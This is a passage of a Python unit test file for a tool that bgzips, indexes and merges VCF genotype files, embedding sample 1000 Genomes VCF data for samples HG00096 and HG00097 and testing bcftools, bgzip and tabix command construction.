##INFO=<ID=AC,Number=A,Type=Integer,Description="Total number of alternate alleles in called genotypes">
##INFO=<ID=AF,Number=A,Type=Float,Description="Estimated allele frequency in the range (0,1)">
##INFO=<ID=NS,Number=1,Type=Integer,Description="Number of samples with data">
##INFO=<ID=AN,Number=1,Type=Integer,Description="Total number of alleles in called genotypes">
##INFO=<ID=EAS_AF,Number=A,Type=Float,Description="Allele frequency in the EAS populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=EUR_AF,Number=A,Type=Float,Description="Allele frequency in the EUR populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=AFR_AF,Number=A,Type=Float,Description="Allele frequency in the AFR populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=AMR_AF,Number=A,Type=Float,Description="Allele frequency in the AMR populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=SAS_AF,Number=A,Type=Float,Description="Allele frequency in the SAS populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=DP,Number=1,Type=Integer,Description="Total read depth; only low coverage data were counted towards the DP, exome data were not used">
##INFO=<ID=AA,Number=1,Type=String,Description="Ancestral Allele. Format: AA|REF|ALT|IndelType. AA: Ancestral allele, REF:Reference Allele, ALT:Alternate Allele, IndelType:Type of Indel (REF, ALT and IndelType are only defined for indels)">
##INFO=<ID=VT,Number=.,Type=String,Description="indicates what type of variant the line represents">
##INFO=<ID=EX_TARGET,Number=0,Type=Flag,Description="indicates whether a variant is within the exon pull down target boundaries">
##INFO=<ID=MULTI_ALLELIC,Number=0,Type=Flag,Description="indicates whether a site is multi-allelic">
##bcftools_viewVersion=1.6+htslib-1.6
##bcftools_viewCommand=view -c1 -Oz -s HG00096 -o G1000_chr1_10000_20000.HG00096.vcf.gz G1000_chr1_10000_20000.vcf.gz; Date=Mon Nov 6 15:48:17 2017
#CHROM POS ID REF ALT QUAL FILTER INFO FORMAT HG00096
1 10177 rs367896724 A AC 100 PASS AC=1;AF=0.425319;AN=2;NS=2504;DP=103152;EAS_AF=0.3363;AMR_AF=0.3602;AFR_AF=0.4909;EUR_AF=0.4056;SAS_AF=0.4949;AA=|||unknown(NO_COVERAGE);VT=INDEL GT 1|0
1 10352 rs555500075 T TA 100 PASS AC=1;AF=0.4375;AN=2;NS=2504;DP=88915;EAS_AF=0.4306;AMR_AF=0.4107;AFR_AF=0.4788;EUR_AF=0.4264;SAS_AF=0.4192;AA=|||unknown(NO_COVERAGE);VT=INDEL GT 1|0
1 10616 rs376342519 CCGCCGTTGCAAAGGCGCGCCG C 100 PASS AC=2;AF=0.993011;AN=2;NS=2504;DP=2365;EAS_AF=0.9911;AMR_AF=0.9957;AFR_AF=0.9894;EUR_AF=0.994;SAS_AF=0.9969;VT=INDEL GT 1|1
1 14464 rs546169444 A T 100 PASS AC=2;AF=0.0958466;AN=2;NS=2504;DP=26761;EAS_AF=0.005;AMR_AF=0.1138;AFR_AF=0.0144;EUR_AF=0.1859;SAS_AF=0.1943;AA=a|||;VT=SNP GT 1|1
1 14930 rs75454623 A G 100 PASS AC=1;AF=0.482228;AN=2;NS=2504;DP=42231;EAS_AF=0.4137;AMR_AF=0.5231;AFR_AF=0.4811;EUR_AF=0.5209;SAS_AF=0.4857;AA=a|||;VT=SNP GT 1|0
1 15211 rs78601809 T G 100 PASS AC=1;AF=0.609026;AN=2;NS=2504;DP=32245;EAS_AF=0.504;AMR_AF=0.6772;AFR_AF=0.5371;EUR_AF=0.7316;SAS_AF=0.6401;AA=t|||;VT=SNP GT 0|1
1 15274 rs62636497 A G,T 100 PASS AC=1,1;AF=0.347244,0.640974;AN=2;NS=2504;DP=23255;EAS_AF=0.4812,0.5188;AMR_AF=0.2752,0.7205;AFR_AF=0.323,0.6369;EUR_AF=0.2922,0.7078;SAS_AF=0.3497,0.6472;AA=g|||;VT=SNP;MULTI_ALLELIC GT 1|2
1 15820 rs2691315 G T 100 PASS AC=1;AF=0.410543;AN=2;NS=2504;DP=14933;EAS_AF=0.6052;AMR_AF=0.2939;AFR_AF=0.4849;EUR_AF=0.2714;SAS_AF=0.3354;AA=t|||;VT=SNP;EX_TARGET GT 1|0
1 15903 rs557514207 G GC 100 PASS AC=1;AF=0.441094;AN=2;NS=2504;DP=7012;EAS_AF=0.8681;AMR_AF=0.415;AFR_AF=0.0431;EUR_AF=0.4652;SAS_AF=0.5327;AA=ccc|CC|CCC|deletion;VT=INDEL;EX_TARGET GT 0|1
1 18849 rs533090414 C G 100 PASS AC=2;AF=0.951877;AN=2;NS=2504;DP=4700;EAS_AF=1;AMR_AF=0.9769;AFR_AF=0.8411;EUR_AF=0.9911;SAS_AF=0.9939;AA=g|||;VT=SNP GT 1|1
"""
HG00097_VCF_CONTENTS = """##fileformat=VCFv4.1
##FILTER=<ID=PASS,Description="All filters passed">
##fileDate=20150218
##reference=ftp://ftp.1000genomes.ebi.ac.uk//vol1/ftp/technical/reference/phase2_reference_assembly_sequence/hs37d5.fa.gz
##source=1000GenomesPhase3Pipeline
##contig=<ID=1,assembly=b37,length=249250621>
##contig=<ID=2,assembly=b37,length=243199373>
##contig=<ID=3,assembly=b37,length=198022430>
##contig=<ID=4,assembly=b37,length=191154276>
##contig=<ID=5,assembly=b37,length=180915260>
##contig=<ID=6,assembly=b37,length=171115067>
##contig=<ID=7,assembly=b37,length=159138663>
##contig=<ID=8,assembly=b37,length=146364022>
##contig=<ID=9,assembly=b37,length=141213431>
##contig=<ID=10,assembly=b37,length=135534747>
##contig=<ID=11,assembly=b37,length=135006516>
##contig=<ID=12,assembly=b37,length=133851895>
##contig=<ID=13,assembly=b37,length=115169878>
##contig=<ID=14,assembly=b37,length=107349540>
##contig=<ID=15,assembly=b37,length=102531392>
##contig=<ID=16,assembly=b37,length=90354753>
##contig=<ID=17,assembly=b37,length=81195210>
##contig=<ID=18,assembly=b37,length=78077248>
##contig=<ID=19,assembly=b37,length=59128983>
##contig=<ID=20,assembly=b37,length=63025520>
##contig=<ID=21,assembly=b37,length=48129895>
##contig=<ID=22,assembly=b37,length=51304566>
##contig=<ID=GL000191.1,assembly=b37,length=106433>
##contig=<ID=GL000192.1,assembly=b37,length=547496>
##contig=<ID=GL000193.1,assembly=b37,length=189789>
##contig=<ID=GL000194.1,assembly=b37,length=191469>
##contig=<ID=GL000195.1,assembly=b37,length=182896>
##contig=<ID=GL000196.1,assembly=b37,length=38914>
##contig=<ID=GL000197.1,assembly=b37,length=37175>
##contig=<ID=GL000198.1,assembly=b37,length=90085>
##contig=<ID=GL000199.1,assembly=b37,length=169874>
##contig=<ID=GL000200.1,assembly=b37,length=187035>
##contig=<ID=GL000201.1,assembly=b37,length=36148>
##contig=<ID=GL000202.1,assembly=b37,length=40103>
##contig=<ID=GL000203.1,assembly=b37,length=37498>
##contig=<ID=GL000204.1,assembly=b37,length=81310>
##contig=<ID=GL000205.1,assembly=b37,length=174588>
##contig=<ID=GL000206.1,assembly=b37,length=41001>
##contig=<ID=GL000207.1,assembly=b37,length=4262>
##contig=<ID=GL000208.1,assembly=b37,length=92689>
##contig=<ID=GL000209.1,assembly=b37,length=159169>
##contig=<ID=GL000210.1,assembly=b37,length=27682>
##contig=<ID=GL000211.1,assembly=b37,length=166566>
##contig=<ID=GL000212.1,assembly=b37,length=186858>
##contig=<ID=GL000213.1,assembly=b37,length=164239>
##contig=<ID=GL000214.1,assembly=b37,length=137718>
##contig=<ID=GL000215.1,assembly=b37,length=172545>
##contig=<ID=GL000216.1,assembly=b37,length=172294>
##contig=<ID=GL000217.1,assembly=b37,length=172149>
##contig=<ID=GL000218.1,assembly=b37,length=161147>
##contig=<ID=GL000219.1,assembly=b37,length=179198>
##contig=<ID=GL000220.1,assembly=b37,length=161802>
##contig=<ID=GL000221.1,assembly=b37,length=155397>
##contig=<ID=GL000222.1,assembly=b37,length=186861>
##contig=<ID=GL000223.1,assembly=b37,length=180455>
##contig=<ID=GL000224.1,assembly=b37,length=179693>
##contig=<ID=GL000225.1,assembly=b37,length=211173>
##contig=<ID=GL000226.1,assembly=b37,length=15008>
##contig=<ID=GL000227.1,assembly=b37,length=128374>
##contig=<ID=GL000228.1,assembly=b37,length=129120>
##contig=<ID=GL000229.1,assembly=b37,length=19913>
##contig=<ID=GL000230.1,assembly=b37,length=43691>
##contig=<ID=GL000231.1,assembly=b37,length=27386>
##contig=<ID=GL000232.1,assembly=b37,length=40652>
##contig=<ID=GL000233.1,assembly=b37,length=45941>
##contig=<ID=GL000234.1,assembly=b37,length=40531>
##contig=<ID=GL000235.1,assembly=b37,length=34474>
##contig=<ID=GL000236.1,assembly=b37,length=41934>
##contig=<ID=GL000237.1,assembly=b37,length=45867>
##contig=<ID=GL000238.1,assembly=b37,length=39939>
##contig=<ID=GL000239.1,assembly=b37,length=33824>
##contig=<ID=GL000240.1,assembly=b37,length=41933>
##contig=<ID=GL000241.1,assembly=b37,length=42152>
##contig=<ID=GL000242.1,assembly=b37,length=43523>
##contig=<ID=GL000243.1,assembly=b37,length=43341>
##contig=<ID=GL000244.1,assembly=b37,length=39929>
##contig=<ID=GL000245.1,assembly=b37,length=36651>
##contig=<ID=GL000246.1,assembly=b37,length=38154>
##contig=<ID=GL000247.1,assembly=b37,length=36422>
##contig=<ID=GL000248.1,assembly=b37,length=39786>
##contig=<ID=GL000249.1,assembly=b37,length=38502>
##contig=<ID=MT,assembly=b37,length=16569>
##contig=<ID=NC_007605,assembly=b37,length=171823>
##contig=<ID=X,assembly=b37,length=155270560>
##contig=<ID=Y,assembly=b37,length=59373566>
##contig=<ID=hs37d5,assembly=b37,length=35477943>
##ALT=<ID=CNV,Description="Copy Number Polymorphism">
##ALT=<ID=DEL,Description="Deletion">
##ALT=<ID=DUP,Description="Duplication">
##ALT=<ID=INS:ME:ALU,Description="Insertion of ALU element">
##ALT=<ID=INS:ME:LINE1,Description="Insertion of LINE1 element">
##ALT=<ID=INS:ME:SVA,Description="Insertion of SVA element">
##ALT=<ID=INS:MT,Description="Nuclear Mitochondrial Insertion">
##ALT=<ID=INV,Description="Inversion">
##ALT=<ID=CN0,Description="Copy number allele: 0 copies">
##ALT=<ID=CN1,Description="Copy number allele: 1 copy">
##ALT=<ID=CN2,Description="Copy number allele: 2 copies">
##ALT=<ID=CN3,Description="Copy number allele: 3 copies">
##ALT=<ID=CN4,Description="Copy number allele: 4 copies">
##ALT=<ID=CN5,Description="Copy number allele: 5 copies">
##ALT=<ID=CN6,Description="Copy number allele: 6 copies">
##ALT=<ID=CN7,Description="Copy number allele: 7 copies">
##ALT=<ID=CN8,Description="Copy number allele: 8 copies">
##ALT=<ID=CN9,Description="Copy number allele: 9 copies">
##ALT=<ID=CN10,Description="Copy number allele: 10 copies">
##ALT=<ID=CN11,Description="Copy number allele: 11 copies">
##ALT=<ID=CN12,Description="Copy number allele: 12 copies">
##ALT=<ID=CN13,Description="Copy number allele: 13 copies">
##ALT=<ID=CN14,Description="Copy number allele: 14 copies">
##ALT=<ID=CN15,Description="Copy number allele: 15 copies">
##ALT=<ID=CN16,Description="Copy number allele: 16 copies">
##ALT=<ID=CN17,Description="Copy number allele: 17 copies">
##ALT=<ID=CN18,Description="Copy number allele: 18 copies">
##ALT=<ID=CN19,Description="Copy number allele: 19 copies">
##ALT=<ID=CN20,Description="Copy number allele: 20 copies">
##ALT=<ID=CN21,Description="Copy number allele: 21 copies">
##ALT=<ID=CN22,Description="Copy number allele: 22 copies">
##ALT=<ID=CN23,Description="Copy number allele: 23 copies">
##ALT=<ID=CN24,Description="Copy number allele: 24 copies">
##ALT=<ID=CN25,Description="Copy number allele: 25 copies">
##ALT=<ID=CN26,Description="Copy number allele: 26 copies">
##ALT=<ID=CN27,Description="Copy number allele: 27 copies">
##ALT=<ID=CN28,Description="Copy number allele: 28 copies">
##ALT=<ID=CN29,Description="Copy number allele: 29 copies">
##ALT=<ID=CN30,Description="Copy number allele: 30 copies">
##ALT=<ID=CN31,Description="Copy number allele: 31 copies">
##ALT=<ID=CN32,Description="Copy number allele: 32 copies">
##ALT=<ID=CN33,Description="Copy number allele: 33 copies">
##ALT=<ID=CN34,Description="Copy number allele: 34 copies">
##ALT=<ID=CN35,Description="Copy number allele: 35 copies">
##ALT=<ID=CN36,Description="Copy number allele: 36 copies">
##ALT=<ID=CN37,Description="Copy number allele: 37 copies">
##ALT=<ID=CN38,Description="Copy number allele: 38 copies">
##ALT=<ID=CN39,Description="Copy number allele: 39 copies">
##ALT=<ID=CN40,Description="Copy number allele: 40 copies">
##ALT=<ID=CN41,Description="Copy number allele: 41 copies">
##ALT=<ID=CN42,Description="Copy number allele: 42 copies">
##ALT=<ID=CN43,Description="Copy number allele: 43 copies">
##ALT=<ID=CN44,Description="Copy number allele: 44 copies">
##ALT=<ID=CN45,Description="Copy number allele: 45 copies">
##ALT=<ID=CN46,Description="Copy number allele: 46 copies">
##ALT=<ID=CN47,Description="Copy number allele: 47 copies">
##ALT=<ID=CN48,Description="Copy number allele: 48 copies">
##ALT=<ID=CN49,Description="Copy number allele: 49 copies">
##ALT=<ID=CN50,Description="Copy number allele: 50 copies">
##ALT=<ID=CN51,Description="Copy number allele: 51 copies">
##ALT=<ID=CN52,Description="Copy number allele: 52 copies">
##ALT=<ID=CN53,Description="Copy number allele: 53 copies">
##ALT=<ID=CN54,Description="Copy number allele: 54 copies">
##ALT=<ID=CN55,Description="Copy number allele: 55 copies">
##ALT=<ID=CN56,Description="Copy number allele: 56 copies">
##ALT=<ID=CN57,Description="Copy number allele: 57 copies">
##ALT=<ID=CN58,Description="Copy number allele: 58 copies">
##ALT=<ID=CN59,Description="Copy number allele: 59 copies">
##ALT=<ID=CN60,Description="Copy number allele: 60 copies">
##ALT=<ID=CN61,Description="Copy number allele: 61 copies">
##ALT=<ID=CN62,Description="Copy number allele: 62 copies">
##ALT=<ID=CN63,Description="Copy number allele: 63 copies">
##ALT=<ID=CN64,Description="Copy number allele: 64 copies">
##ALT=<ID=CN65,Description="Copy number allele: 65 copies">
##ALT=<ID=CN66,Description="Copy number allele: 66 copies">
##ALT=<ID=CN67,Description="Copy number allele: 67 copies">
##ALT=<ID=CN68,Description="Copy number allele: 68 copies">
##ALT=<ID=CN69,Description="Copy number allele: 69 copies">
##ALT=<ID=CN70,Description="Copy number allele: 70 copies">
##ALT=<ID=CN71,Description="Copy number allele: 71 copies">
##ALT=<ID=CN72,Description="Copy number allele: 72 copies">
##ALT=<ID=CN73,Description="Copy number allele: 73 copies">
##ALT=<ID=CN74,Description="Copy number allele: 74 copies">
##ALT=<ID=CN75,Description="Copy number allele: 75 copies">
##ALT=<ID=CN76,Description="Copy number allele: 76 copies">
##ALT=<ID=CN77,Description="Copy number allele: 77 copies">
##ALT=<ID=CN78,Description="Copy number allele: 78 copies">
##ALT=<ID=CN79,Description="Copy number allele: 79 copies">
##ALT=<ID=CN80,Description="Copy number allele: 80 copies">
##ALT=<ID=CN81,Description="Copy number allele: 81 copies">
##ALT=<ID=CN82,Description="Copy number allele: 82 copies">
##ALT=<ID=CN83,Description="Copy number allele: 83 copies">
##ALT=<ID=CN84,Description="Copy number allele: 84 copies">
##ALT=<ID=CN85,Description="Copy number allele: 85 copies">
##ALT=<ID=CN86,Description="Copy number allele: 86 copies">
##ALT=<ID=CN87,Description="Copy number allele: 87 copies">
##ALT=<ID=CN88,Description="Copy number allele: 88 copies">
##ALT=<ID=CN89,Description="Copy number allele: 89 copies">
##ALT=<ID=CN90,Description="Copy number allele: 90 copies">
##ALT=<ID=CN91,Description="Copy number allele: 91 copies">
##ALT=<ID=CN92,Description="Copy number allele: 92 copies">
##ALT=<ID=CN93,Description="Copy number allele: 93 copies">
##ALT=<ID=CN94,Description="Copy number allele: 94 copies">
##ALT=<ID=CN95,Description="Copy number allele: 95 copies">
##ALT=<ID=CN96,Description="Copy number allele: 96 copies">
##ALT=<ID=CN97,Description="Copy number allele: 97 copies">
##ALT=<ID=CN98,Description="Copy number allele: 98 copies">
##ALT=<ID=CN99,Description="Copy number allele: 99 copies">
##ALT=<ID=CN100,Description="Copy number allele: 100 copies">
##ALT=<ID=CN101,Description="Copy number allele: 101 copies">
##ALT=<ID=CN102,Description="Copy number allele: 102 copies">
##ALT=<ID=CN103,Description="Copy number allele: 103 copies">
##ALT=<ID=CN104,Description="Copy number allele: 104 copies">
##ALT=<ID=CN105,Description="Copy number allele: 105 copies">
##ALT=<ID=CN106,Description="Copy number allele: 106 copies">
##ALT=<ID=CN107,Description="Copy number allele: 107 copies">
##ALT=<ID=CN108,Description="Copy number allele: 108 copies">
##ALT=<ID=CN109,Description="Copy number allele: 109 copies">
##ALT=<ID=CN110,Description="Copy number allele: 110 copies">
##ALT=<ID=CN111,Description="Copy number allele: 111 copies">
##ALT=<ID=CN112,Description="Copy number allele: 112 copies">
##ALT=<ID=CN113,Description="Copy number allele: 113 copies">
##ALT=<ID=CN114,Description="Copy number allele: 114 copies">
##ALT=<ID=CN115,Description="Copy number allele: 115 copies">
##ALT=<ID=CN116,Description="Copy number allele: 116 copies">
##ALT=<ID=CN117,Description="Copy number allele: 117 copies">
##ALT=<ID=CN118,Description="Copy number allele: 118 copies">
##ALT=<ID=CN119,Description="Copy number allele: 119 copies">
##ALT=<ID=CN120,Description="Copy number allele: 120 copies">
##ALT=<ID=CN121,Description="Copy number allele: 121 copies">
##ALT=<ID=CN122,Description="Copy number allele: 122 copies">
##ALT=<ID=CN123,Description="Copy number allele: 123 copies">
##ALT=<ID=CN124,Description="Copy number allele: 124 copies">
##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">
##INFO=<ID=CIEND,Number=2,Type=Integer,Description="Confidence interval around END for imprecise variants">
##INFO=<ID=CIPOS,Number=2,Type=Integer,Description="Confidence interval around POS for imprecise variants">
##INFO=<ID=CS,Number=1,Type=String,Description="Source call set.">
##INFO=<ID=END,Number=1,Type=Integer,Description="End coordinate of this variant">
##INFO=<ID=IMPRECISE,Number=0,Type=Flag,Description="Imprecise structural variation">
##INFO=<ID=MC,Number=.,Type=String,Description="Merged calls.">
##INFO=<ID=MEINFO,Number=4,Type=String,Description="Mobile element info of the form NAME,START,END<POLARITY; If there is only 5' OR 3' support for this call, will be NULL NULL for START and END">
##INFO=<ID=MEND,Number=1,Type=Integer,Description="Mitochondrial end coordinate of inserted sequence">
##INFO=<ID=MLEN,Number=1,Type=Integer,Description="Estimated length of mitochondrial insert">
##INFO=<ID=MSTART,Number=1,Type=Integer,Description="Mitochondrial start coordinate of inserted sequence">
##INFO=<ID=SVLEN,Number=.,Type=Integer,Description="SV length. It is only calculated for structural variation MEIs. For other types of SVs; one may calculate the SV length by INFO:END-START+1, or by finding the difference between lengthes of REF and ALT alleles">
##INFO=<ID=SVTYPE,Number=1,Type=String,Description="Type of structural variant">
##INFO=<ID=TSD,Number=1,Type=String,Description="Precise Target Site Duplication for bases, if unknown, value will be NULL">
##INFO=<ID=AC,Number=A,Type=Integer,Description="Total number of alternate alleles in called genotypes">
##INFO=<ID=AF,Number=A,Type=Float,Description="Estimated allele frequency in the range (0,1)">
##INFO=<ID=NS,Number=1,Type=Integer,Description="Number of samples with data">
##INFO=<ID=AN,Number=1,Type=Integer,Description="Total number of alleles in called genotypes">
##INFO=<ID=EAS_AF,Number=A,Type=Float,Description="Allele frequency in the EAS populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=EUR_AF,Number=A,Type=Float,Description="Allele frequency in the EUR populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=AFR_AF,Number=A,Type=Float,Description="Allele frequency in the AFR populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=AMR_AF,Number=A,Type=Float,Description="Allele frequency in the AMR populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=SAS_AF,Number=A,Type=Float,Description="Allele frequency in the SAS populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=DP,Number=1,Type=Integer,Description="Total read depth; only low coverage data were counted towards the DP, exome data were not used">
##INFO=<ID=AA,Number=1,Type=String,Description="Ancestral Allele. Format: AA|REF|ALT|IndelType. AA: Ancestral allele, REF:Reference Allele, ALT:Alternate Allele, IndelType:Type of Indel (REF, ALT and IndelType are only defined for indels)">
##INFO=<ID=VT,Number=.,Type=String,Description="indicates what type of variant the line represents">
##INFO=<ID=EX_TARGET,Number=0,Type=Flag,Description="indicates whether a variant is within the exon pull down target boundaries">
##INFO=<ID=MULTI_ALLELIC,Number=0,Type=Flag,Description="indicates whether a site is multi-allelic">
##bcftools_viewVersion=1.6+htslib-1.6
##bcftools_viewCommand=view -c1 -Oz -s HG00097 -o G1000_chr1_10000_20000.HG00097.vcf.gz G1000_chr1_10000_20000.vcf.gz; Date=Mon Nov 6 15:48:23 2017
#CHROM POS ID REF ALT QUAL FILTER INFO FORMAT HG00097
1 10177 rs367896724 A AC 100 PASS AC=1;AF=0.425319;AN=2;NS=2504;DP=103152;EAS_AF=0.3363;AMR_AF=0.3602;AFR_AF=0.4909;EUR_AF=0.4056;SAS_AF=0.4949;AA=|||unknown(NO_COVERAGE);VT=INDEL GT 0|1
1 10352 rs555500075 T TA 100 PASS AC=1;AF=0.4375;AN=2;NS=2504;DP=88915;EAS_AF=0.4306;AMR_AF=0.4107;AFR_AF=0.4788;EUR_AF=0.4264;SAS_AF=0.4192;AA=|||unknown(NO_COVERAGE);VT=INDEL GT 1|0
1 10616 rs376342519 CCGCCGTTGCAAAGGCGCGCCG C 100 PASS AC=2;AF=0.993011;AN=2;NS=2504;DP=2365;EAS_AF=0.9911;AMR_AF=0.9957;AFR_AF=0.9894;EUR_AF=0.994;SAS_AF=0.9969;VT=INDEL GT 1|1
1 13110 rs540538026 G A 100 PASS AC=1;AF=0.0267572;AN=2;NS=2504;DP=23422;EAS_AF=0.002;AMR_AF=0.036;AFR_AF=0.0053;EUR_AF=0.0567;SAS_AF=0.044;AA=g|||;VT=SNP GT 1|0
1 13116 rs62635286 T G 100 PASS AC=1;AF=0.0970447;AN=2;NS=2504;DP=22340;EAS_AF=0.0248;AMR_AF=0.121;AFR_AF=0.0295;EUR_AF=0.1869;SAS_AF=0.1534;AA=t|||;VT=SNP GT 1|0
1 13118 rs200579949 A G 100 PASS AC=1;AF=0.0970447;AN=2;NS=2504;DP=21395;EAS_AF=0.0248;AMR_AF=0.121;AFR_AF=0.0295;EUR_AF=0.1869;SAS_AF=0.1534;AA=a|||;VT=SNP GT 1|0
1 14599 rs531646671 T A 100 PASS AC=1;AF=0.147564;AN=2;NS=2504;DP=32081;EAS_AF=0.0893;AMR_AF=0.1758;AFR_AF=0.121;EUR_AF=0.161;SAS_AF=0.2096;AA=t|||;VT=SNP GT 0|1
1 14604 rs541940975 A G 100 PASS AC=1;AF=0.147564;AN=2;NS=2504;DP=29231;EAS_AF=0.0893;AMR_AF=0.1758;AFR_AF=0.121;EUR_AF=0.161;SAS_AF=0.2096;AA=a|||;VT=SNP GT 0|1
1 14930 rs75454623 A G 100 PASS AC=1;AF=0.482228;AN=2;NS=2504;DP=42231;EAS_AF=0.4137;AMR_AF=0.5231;AFR_AF=0.4811;EUR_AF=0.5209;SAS_AF=0.4857;AA=a|||;VT=SNP GT 0|1
1 15211 rs78601809 T G 100 PASS AC=1;AF=0.609026;AN=2;NS=2504;DP=32245;EAS_AF=0.504;AMR_AF=0.6772;AFR_AF=0.5371;EUR_AF=0.7316;SAS_AF=0.6401;AA=t|||;VT=SNP GT 0|1
1 15274 rs62636497 A G,T 100 PASS AC=0,2;AF=0.347244,0.640974;AN=2;NS=2504;DP=23255;EAS_AF=0.4812,0.5188;AMR_AF=0.2752,0.7205;AFR_AF=0.323,0.6369;EUR_AF=0.2922,0.7078;SAS_AF=0.3497,0.6472;AA=g|||;VT=SNP;MULTI_ALLELIC GT 2|2
1 15820 rs2691315 G T 100 PASS AC=1;AF=0.410543;AN=2;NS=2504;DP=14933;EAS_AF=0.6052;AMR_AF=0.2939;AFR_AF=0.4849;EUR_AF=0.2714;SAS_AF=0.3354;AA=t|||;VT=SNP;EX_TARGET GT 0|1
1 15903 rs557514207 G GC 100 PASS AC=1;AF=0.441094;AN=2;NS=2504;DP=7012;EAS_AF=0.8681;AMR_AF=0.415;AFR_AF=0.0431;EUR_AF=0.4652;SAS_AF=0.5327;AA=ccc|CC|CCC|deletion;VT=INDEL;EX_TARGET GT 0|1
1 18849 rs533090414 C G 100 PASS AC=2;AF=0.951877;AN=2;NS=2504;DP=4700;EAS_AF=1;AMR_AF=0.9769;AFR_AF=0.8411;EUR_AF=0.9911;SAS_AF=0.9939;AA=g|||;VT=SNP GT 1|1
"""
@classmethod
def setUpClass(cls):
cls.test_file_dir, cls.test_bgzipped_fps = help_get_test_file_info()
# region _get_vcf_file_paths_list_in_directory tests
def test__get_vcf_file_paths_list_in_directory(self):
temp_dir = tempfile.TemporaryDirectory()
temp_HG00096_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
temp_HG00096_vcf_file.write(self.HG00096_VCF_CONTENTS.encode('ascii'))
temp_HG00096_vcf_file.close() # but DON'T delete yet
temp_HG00097_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
temp_HG00097_vcf_file.write(self.HG00097_VCF_CONTENTS.encode('ascii'))
temp_HG00097_vcf_file.close() # but DON'T delete yet
# also write a NON-vcf file into this dir and ensure it ISN'T included in returned list
temp_non_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=".txt", delete=False)
temp_non_vcf_file.write("test file".encode('ascii'))
temp_non_vcf_file.close() # but DON'T delete yet
expected_output = sorted([temp_HG00096_vcf_file.name, temp_HG00097_vcf_file.name])
real_output = ns_test._get_vcf_file_paths_list_in_directory(temp_dir.name, ns_test.VCF_EXTENSION)
self.assertListEqual(expected_output, real_output)
def test__get_vcf_file_paths_list_in_directory_none(self):
temp_dir = tempfile.TemporaryDirectory()
real_output = ns_test._get_vcf_file_paths_list_in_directory(temp_dir.name, ns_test.VCF_EXTENSION)
self.assertListEqual([], real_output)
# endregion
def test__build_merge_vcf_command_str(self):
input_vcf_fps_list = ["my/vcf_folder/vcf_file1.vcf", "my/vcf_folder/vcf_file2.vcf"]
expected_output = "bcftools merge my/vcf_folder/vcf_file1.vcf my/vcf_folder/vcf_file2.vcf"
real_output = ns_test._build_merge_vcf_command_str(input_vcf_fps_list)
self.assertEqual(expected_output, real_output)
def test__build_bgzip_vcf_command_str(self):
real_output = ns_test._build_bgzip_vcf_command_str("my/vcf_folder/vcf_file1.vcf")
self.assertEqual("bgzip -c my/vcf_folder/vcf_file1.vcf", real_output)
def test__build_index_vcf_command_str(self):
real_output = ns_test._build_index_vcf_command_str("my/vcf_folder/vcf_file1.vcf.gz")
self.assertEqual('tabix -p vcf my/vcf_folder/vcf_file1.vcf.gz', real_output)
# region _bgzip_and_index_vcf tests
def test_bgzip_and_index_vcf_is_vcf_gz(self):
input_fp = expected_output = "my/vcf_folder/vcf_file1.vcf.gz"
real_output = ns_test.bgzip_and_index_vcf(input_fp)
self.assertEqual(expected_output, real_output)
def test_bgzip_and_index_vcf_not_vcf_gz(self):
# NB: output .vcf.gz file and .vcf.gz.tbi files are placed in the same directory as the input file.
# To ensure they are cleaned up after the test is over, place everything in a temporary directory
temp_dir = tempfile.TemporaryDirectory()
temp_HG00097_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
temp_HG00097_vcf_file.write(self.HG00097_VCF_CONTENTS.encode('ascii'))
temp_HG00097_vcf_file.close() # but DON'T delete yet
expected_output = temp_HG00097_vcf_file.name + ".gz"
real_output = ns_test.bgzip_and_index_vcf(temp_HG00097_vcf_file.name)
# NB: I am not checking the *contents* of these files; they are created by subprocess calls to outside programs
# and I am going to trust that those outside programs do their jobs as advertised.
self.assertTrue(os.path.isfile(temp_HG00097_vcf_file.name + ".gz"))
self.assertTrue(os.path.isfile(temp_HG00097_vcf_file.name + ".gz.tbi"))
self.assertEqual(expected_output, real_output)
# endregion
def test__merge_bgzipped_indexed_vcfs(self):
# NB: This method works on *already-bgzipped-and-indexed* vcf files, which is why I'm depending on
# pre-provided test files rather than making my own temporary test files.
# put the output file in a temporary directory so it will be automatically cleaned up when test finishes
temp_dir = tempfile.TemporaryDirectory()
output_vcf_fp = temp_dir.name + "temp.vcf.gz"
ns_test._merge_bgzipped_indexed_vcfs(self.test_bgzipped_fps, output_vcf_fp)
# NB: Again, I am not checking the *contents* of this files; it is created by a subprocess call to an outside
# programs and I am going to trust that outside program does its job as advertised.
self.assertTrue(os.path.isfile(output_vcf_fp))
self.assertTrue(os.stat(output_vcf_fp).st_size > 0) # file size > 0
# region merge_vcfs tests
def test_merge_vcfs_multiple_by_dir_not_bgzipped(self):
temp_dir = tempfile.TemporaryDirectory()
temp_HG00096_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
temp_HG00096_vcf_file.write(self.HG00096_VCF_CONTENTS.encode('ascii'))
temp_HG00096_vcf_file.close() # but DON'T delete yet
temp_HG00097_vcf_file = tempfile.NamedTemporaryFile(dir=temp_dir.name, suffix=ns_test.VCF_EXTENSION, delete=False)
temp_HG00097_vcf_file.write(self.HG00097_VCF_CONTENTS.encode('ascii'))
temp_HG00097_vcf_file.close() # but DON'T delete yet
expected_output_vcf_fp = os.path.join(temp_dir.name, "tempy.vcf")
real_output_vcf_fp = ns_test.merge_vcfs(temp_dir.name, temp_dir.name, "tempy")
self.assertEqual(expected_output_vcf_fp, real_output_vcf_fp)
self.assertTrue(os.path.isfile(real_output_vcf_fp))
with open(real_output_vcf_fp, 'r') as f:
sample_names_list = vcf.Reader(f).samples
